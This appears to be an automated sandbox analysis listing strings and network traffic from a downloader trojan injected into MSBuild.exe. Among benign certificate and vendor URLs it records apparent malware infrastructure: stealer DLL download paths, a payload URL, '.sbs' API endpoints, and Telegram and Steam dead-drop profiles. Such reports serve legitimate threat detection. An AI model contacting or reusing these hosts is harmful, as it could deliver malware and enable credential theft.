Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/H
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/freebl3.dll
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/mozglue.dll
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/mozglue.dllJ
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/msvcp140.dll
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/msvcp140.dllW
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/nss3.dll
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/softokn3.dll
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/sql.dll1$
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/sql.dllK%
Source: MSBuild.exe, 00000002.00000002.2517585992.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/vcruntime140.dll
Source: MSBuild.exe, 00000002.00000002.2517585992.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com/vcruntime140.dll4k
Source: MSBuild.exe, 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com:80
Source: MSBuild.exe, 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com:80/sql.dll
Source: MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://kasm.zubairgul.com:80ontent-Disposition:
Source: MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe
Source: MSBuild.exe, 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe1kkkk
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, a43486128347[1].exe.2.dr, nss3.dll.2.dr, AKEGIIJDGH.exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, a43486128347[1].exe.2.dr, nss3.dll.2.dr, AKEGIIJDGH.exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, a43486128347[1].exe.2.dr, nss3.dll.2.dr, AKEGIIJDGH.exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: MSBuild.exe, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2563025623.000000006CA4D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537675257.00000000205FD000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: JJDGCG.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: JJDGCG.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: JJDGCG.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: JJDGCG.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: MSBuild.exe, 0000000D.00000002.2620262148.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/#
Source: MSBuild.exe, 0000000D.00000002.2620262148.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/api
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/api0
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/apif
Source: JJDGCG.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JJDGCG.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: JJDGCG.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/api
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/apiG
Source: AECAKE.2.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/::
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api9
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/apia
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/b_
Source: MSBuild.exe, 0000000D.00000002.2620474258.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
Source: MSBuild.exe, 0000000D.00000002.2620746341.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: BGIIDA.2.dr	String found in binary or memory: https://support.mozilla.org
Source: BGIIDA.2.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BGIIDA.2.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000152B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/lpnjoke
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
Source: MSBuild.exe, 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/maslengdsa
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/maslengdsafdmskfj3efskoahttps://steamcommunity.com/profiles/76561199786602107g0b4cMozil
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000152B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: MSBuild.exe, 00000002.00000002.2517585992.0000000001547000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2517585992.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, AECAKE.2.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: JJDGCG.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe, a43486128347[1].exe.2.dr, AKEGIIJDGH.exe.2.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: JJDGCG.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BGIIDA.2.dr	String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000002.00000002.2532694156.000000001A14C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: BGIIDA.2.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: MSBuild.exe, 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: MSBuild.exe, 00000002.00000002.2532694156.000000001A14C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: MSBuild.exe, 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/Windows:
Source: BGIIDA.2.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: MSBuild.exe, 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/jZOkhVeFVvsESOxZ.exe
Source: MSBuild.exe, 00000002.00000002.2532694156.000000001A14C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: BGIIDA.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MSBuild.exe, 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: BGIIDA.2.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BGIIDA.2.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: MSBuild.exe, 00000002.00000002.2532694156.000000001A14C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: BGIIDA.2.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
